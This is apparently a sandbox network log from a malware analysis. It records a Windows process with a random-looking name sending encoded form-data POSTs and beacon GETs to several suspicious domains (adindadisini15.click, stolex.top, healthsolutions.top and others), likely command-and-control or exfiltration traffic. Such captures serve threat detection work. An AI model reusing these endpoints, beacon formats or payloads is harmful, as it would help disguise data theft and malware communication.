                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.adindadisini15.click
                                        Origin: http://www.adindadisini15.click
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.adindadisini15.click/vufj/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=zFrZDEsMDjlc5hquY3DhlaJttYEnpaiGYNJHAwPcsYNRlOLnzhkmv/zHqZIpkeJLy/rUKR+bskGTqe26S5wfucl6ikBQ3yIdihQY5CGuWPUOhnrxMApPmTXXEnqYlTbUCBqzm8+BiX5+xzsvUrwrTigX0pPQ1hbp3FHe75bb+wd6muGdklx53W1OaGPtP5mrVnFOy4wyY2Zh0YU1DcLNq9pos0SzUOrB4w==
                                        Aug 27, 2024 08:43:33.118436098 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Connection: close
                                        x-powered-by: PHP/7.4.33
                                        x-litespeed-tag: a7b_HTTP.404
                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        content-type: text/html; charset=UTF-8
                                        link: <https://adindadisini15.click/wp-json/>; rel="https://api.w.org/"
                                        x-litespeed-cache-control: no-cache
                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                        transfer-encoding: chunked
                                        content-encoding: gzip
                                        vary: Accept-Encoding
                                        date: Tue, 27 Aug 2024 06:43:33 GMT
                                        server: LiteSpeed


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        27 | 192.168.2.6 | 51224 | 172.96.186.147 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:34.988114119 CEST | 1892 | OUT | POST /vufj/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.adindadisini15.click
                                        Origin: http://www.adindadisini15.click
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.adindadisini15.click/vufj/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=[TRUNCATED]
                                        Aug 27, 2024 08:43:35.762628078 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Connection: close
                                        x-powered-by: PHP/7.4.33
                                        x-litespeed-tag: a7b_HTTP.404
                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        content-type: text/html; charset=UTF-8
                                        link: <https://adindadisini15.click/wp-json/>; rel="https://api.w.org/"
                                        x-litespeed-cache-control: no-cache
                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                        content-length: 13246
                                        content-encoding: gzip
                                        vary: Accept-Encoding
                                        date: Tue, 27 Aug 2024 06:43:35 GMT
                                        server: LiteSpeed


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        28 | 192.168.2.6 | 51225 | 172.96.186.147 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:37.534739017 CEST | 591 | OUT | GET /vufj/?mvjDMBx8=+HD5AwEaNmB+2iuNGAXu8ZEboMIZq6yiRKp9PVW508Es4ofR/Ro4n6j7lKcu3Nlg5pjwPTuirHLo0Y+yTcgc2ol0tGxsrzJn3Qwp0zn1So0PhkHXRjdNu1v/OX+x6wvNfDHKpos=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.adindadisini15.click
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:43:38.192948103 CEST | 549 | IN | HTTP/1.1 301 Moved Permanently
                                        Connection: close
                                        x-powered-by: PHP/7.4.33
                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        cache-control: no-cache, must-revalidate, max-age=0
                                        content-type: text/html; charset=UTF-8
                                        x-redirect-by: WordPress
                                        location: http://adindadisini15.click/vufj/?mvjDMBx8=+HD5AwEaNmB+2iuNGAXu8ZEboMIZq6yiRKp9PVW508Es4ofR/Ro4n6j7lKcu3Nlg5pjwPTuirHLo0Y+yTcgc2ol0tGxsrzJn3Qwp0zn1So0PhkHXRjdNu1v/OX+x6wvNfDHKpos=&AT=RrjDj4Z85jYPlHG0
                                        x-litespeed-cache: miss
                                        content-length: 0
                                        date: Tue, 27 Aug 2024 06:43:38 GMT
                                        server: LiteSpeed


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        29 | 192.168.2.6 | 51226 | 162.0.239.141 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:43.448261976 CEST | 825 | OUT | POST /kunq/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.stolex.top
                                        Origin: http://www.stolex.top
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.stolex.top/kunq/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=T0BhC6K0jgYsedshaVmOLw0PMIoAtv1plwyAwq0vxnrkyrlsh7Csmw//HoIePl2gtXp1baSVwGKpk7nG10p/VybILhT+AiNqxr+k1ZY2vKFeMDXSyG4ndP7S0mCGe50djTDdJa7smTuzZkKFiMqzakLnsKrHEqFhEYwa8wiTKfM1YYRSo/3F1DuNbJumeDsS1Bp4NfbDzcwH
                                        Aug 27, 2024 08:43:44.030395031 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:43:43 GMT
                                        Server: Apache
                                        Content-Length: 18121
                                        Connection: close
                                        Content-Type: text/html


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        30 | 192.168.2.6 | 51227 | 162.0.239.141 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:45.987236977 CEST | 849 | OUT | POST /kunq/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.stolex.top
                                        Origin: http://www.stolex.top
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.stolex.top/kunq/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=T0BhC6K0jgYse8chbyyONQ0MQ4oA0/1tlw+AwrxkyV/k1OZsg6CsoQ//f4JWAF23tX1LbfqVwGupk6XG1FpgUibKTRT8PCNqxr+k1d4cvOpeMwPSxn4mVv7d9GCGIJ0ZjTDzJaLWmRWzZgOFiY+wN0LloKqNH50DAq1ayjaHL/A0QOQI0M3mnTOPbL2Uejs43BR4fIXk8oVk/QH7ruaT1Ij/KusIKDEH5g==
                                        Aug 27, 2024 08:43:46.567090034 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:43:46 GMT
                                        Server: Apache
                                        Content-Length: 18121
                                        Connection: close
                                        Content-Type: text/html


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        31 | 192.168.2.6 | 51228 | 162.0.239.141 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:48.539870024 CEST | 1862 | OUT | POST /kunq/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.stolex.top
                                        Origin: http://www.stolex.top
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.stolex.top/kunq/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:43:49.164372921 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:43:49 GMT
                                        Server: Apache
                                        Content-Length: 18121
                                        Connection: close
                                        Content-Type: text/html


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        32 | 192.168.2.6 | 51229 | 162.0.239.141 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:51.077570915 CEST | 581 | OUT | GET /kunq/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=e2pBBNKfhlcNZug/MlikLwl2FbwO8O5PulKDyYpFlUnCxZtvvcHmj1jMPp0LVU20n2VhUZuzz0qV7Mfxt0dNEDuQKyzOHg8PupeV8YN8l6deJxHpy2VUY+/g7EuAZK4kmgb6d+0= HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.stolex.top
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:43:51.707773924 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:43:51 GMT
                                        Server: Apache
                                        Content-Length: 18121
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        33 | 192.168.2.6 | 51230 | 13.248.169.48 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:57.018524885 CEST | 852 | OUT | POST /p2w8/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.healthsolutions.top
                                        Origin: http://www.healthsolutions.top
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.healthsolutions.top/p2w8/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        34 | 192.168.2.6 | 51231 | 13.248.169.48 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:59.567925930 CEST | 876 | OUT | POST /p2w8/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.healthsolutions.top
                                        Origin: http://www.healthsolutions.top
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.healthsolutions.top/p2w8/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        35 | 192.168.2.6 | 51232 | 13.248.169.48 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:02.115555048 CEST | 1889 | OUT | POST /p2w8/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.healthsolutions.top
                                        Origin: http://www.healthsolutions.top
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.healthsolutions.top/p2w8/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        36 | 192.168.2.6 | 51233 | 13.248.169.48 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:04.656879902 CEST | 590 | OUT | GET /p2w8/?mvjDMBx8=0JI5pBGkrmioG/Anacpz3k+IMSt3VJctkawy5IUNmMBmvSb9+k0qoiMhp0vaP6Gu/r9KODYGeXzVD0cydytp7UCw+eBZByGBQdX9huLjshPWbKtQplNWiDD8YzK/NJ1wwprBY8Q=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.healthsolutions.top
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:44:05.125711918 CEST | 420 | IN | HTTP/1.1 200 OK
                                        Server: openresty
                                        Date: Tue, 27 Aug 2024 06:44:05 GMT
                                        Content-Type: text/html
                                        Content-Length: 280
                                        Connection: close
                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mvjDMBx8=0JI5pBGkrmioG/Anacpz3k+IMSt3VJctkawy5IUNmMBmvSb9+k0qoiMhp0vaP6Gu/r9KODYGeXzVD0cydytp7UCw+eBZByGBQdX9huLjshPWbKtQplNWiDD8YzK/NJ1wwprBY8Q=&AT=RrjDj4Z85jYPlHG0"}</script></head></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        37 | 192.168.2.6 | 51234 | 84.32.84.32 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:10.221165895 CEST | 852 | OUT | POST /0jqq/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.staffmasters.online
                                        Origin: http://www.staffmasters.online
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.staffmasters.online/0jqq/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=NZASLXeaiQQGkmbbAInbp1atxJefvhtes2fkbUd4YrW/PuuesjvjZKHc+ak0Ii8as6SicWWK3ttlUkJ5bgJugIwccAUAUGbtfllfkyPndg4Ry2kbhXPqXjGS+DqJZI9FSOyy2WXD9jdPfI6mVWAGi3/6NIN65Shh8SKm414s4lu8PNDnfPzeLfBHjeSc58L8ZSxy5HtAMuNc


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        38 | 192.168.2.6 | 51235 | 84.32.84.32 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:12.775671959 CEST | 876 | OUT | POST /0jqq/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.staffmasters.online
                                        Origin: http://www.staffmasters.online
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.staffmasters.online/0jqq/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=NZASLXeaiQQGlDTbGvLbrVaivZef6xtas2jkbQMzYdG/OO+evivjYKHcmKkxFC8Ns6eEcSSK3t5lUl55YWBthYweFwUCQGbtfllfk2eIdgQRyH0buSjrbDGRuTqJdI9BSOzX2XLl9lZPfJKmVDsFsH/8DoM1xQlu4UX952Uhg1aiK7C9D8z9ZPhFjcKu5cLWbSJyrQhnDao/8AgHokjpqiLE/vLTWu3AVA==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        39 | 192.168.2.6 | 51236 | 84.32.84.32 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:15.319899082 CEST | 1889 | OUT | POST /0jqq/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.staffmasters.online
                                        Origin: http://www.staffmasters.online
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.staffmasters.online/0jqq/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        40 | 192.168.2.6 | 51237 | 84.32.84.32 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:17.869556904 CEST | 590 | OUT | GET /0jqq/?mvjDMBx8=AboyIhWIgkAsu1nqRInTjiDB5La4qA9HyyvfFBNZK/fCO9WV0V/gZMn0uKI8YjcOlIWVaRm32fVlTzhGJzR60qB7FB0ybEu2AENms3yOanM/608x1TKdZl2B8TKOA7VaQ/jM9wk=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.staffmasters.online
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:44:18.319936991 CEST | 1236 | IN | HTTP/1.1 200 OK
                                        Server: hcdn
                                        Date: Tue, 27 Aug 2024 06:44:18 GMT
                                        Content-Type: text/html
                                        Content-Length: 10072
                                        Connection: close
                                        Vary: Accept-Encoding
                                        alt-svc: h3=":443"; ma=86400
                                        x-hcdn-request-id: e37c885e6c219a4e34cd9fe79f8fb776-bos-edge2
                                        Expires: Tue, 27 Aug 2024 06:44:17 GMT
                                        Cache-Control: no-cache
                                        Accept-Ranges: bytes
                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        41 | 192.168.2.6 | 51239 | 199.59.243.226 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:23.516582012 CEST | 861 | OUT | POST /osae/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.personal-loans-jp8.xyz
                                        Origin: http://www.personal-loans-jp8.xyz
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.personal-loans-jp8.xyz/osae/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=XhuM252QvS35Bns7D12vTxjbjzZaSUpx5LvZXH3npx05WLfI8G4Pp7T6entQMctnZJaAJewpDwpwdCnkFN1/GTwfOdFz3SBZZcd2aJj3+D4l4llfHv6bN8XJiNhYQfJg/lgt2lyQALTKDOsY/KGEoqMqz//fjQPJzXXzsczBQjnqSLyvxbSK2Buun51KsdOKaTeatDi/+/GT
                                        Aug 27, 2024 08:44:23.968303919 CEST | 1236 | IN | HTTP/1.1 200 OK
                                        date: Tue, 27 Aug 2024 06:44:23 GMT
                                        content-type: text/html; charset=utf-8
                                        content-length: 1154
                                        x-request-id: afedea78-a9d3-4676-807a-369db58ac62b
                                        cache-control: no-store, max-age=0
                                        accept-ch: sec-ch-prefers-color-scheme
                                        critical-ch: sec-ch-prefers-color-scheme
                                        vary: sec-ch-prefers-color-scheme
                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qfqI4B/HcVzEYJZvvDNGZ2tK3zoR0zLOnCCb0Ng8YDK3V+/lknJNpJuK2QFt95V8UkGHq7WNWRl4NfQdUZb1Ew==
                                        set-cookie: parking_session=afedea78-a9d3-4676-807a-369db58ac62b; expires=Tue, 27 Aug 2024 06:59:23 GMT; path=/
                                        connection: close
                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qfqI4B/HcVzEYJZvvDNGZ2tK3zoR0zLOnCCb0Ng8YDK3V+/lknJNpJuK2QFt95V8UkGHq7WNWRl4NfQdUZb1Ew==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        42 | 192.168.2.6 | 51240 | 199.59.243.226 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:44:26.068656921 CEST | 885 | OUT | POST /osae/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.personal-loans-jp8.xyz
                                        Origin: http://www.personal-loans-jp8.xyz
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.personal-loans-jp8.xyz/osae/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=XhuM252QvS35AHc7FSqvCRjcmzZaY0p15LTZXGy4pCc5WqvIu0QPnbT6RHtZRMtWZJf1JeMpD2FwdCXkF+N8FjwdD9F1oCBZZcd2aIHZ+HUl5W9fGLucO8XKydhYa/Jk/lhI2kuqAIrKDPcY/bGH/6Mosv+2tQChylWFsKbNBCnxX9z1toSpkROsn7t4s9OgYTma/UuYxLjwc3uGTr7HdyWC20oZe1DaLA==
                                        Aug 27, 2024 08:44:26.541621923 CEST | 1236 | IN | HTTP/1.1 200 OK
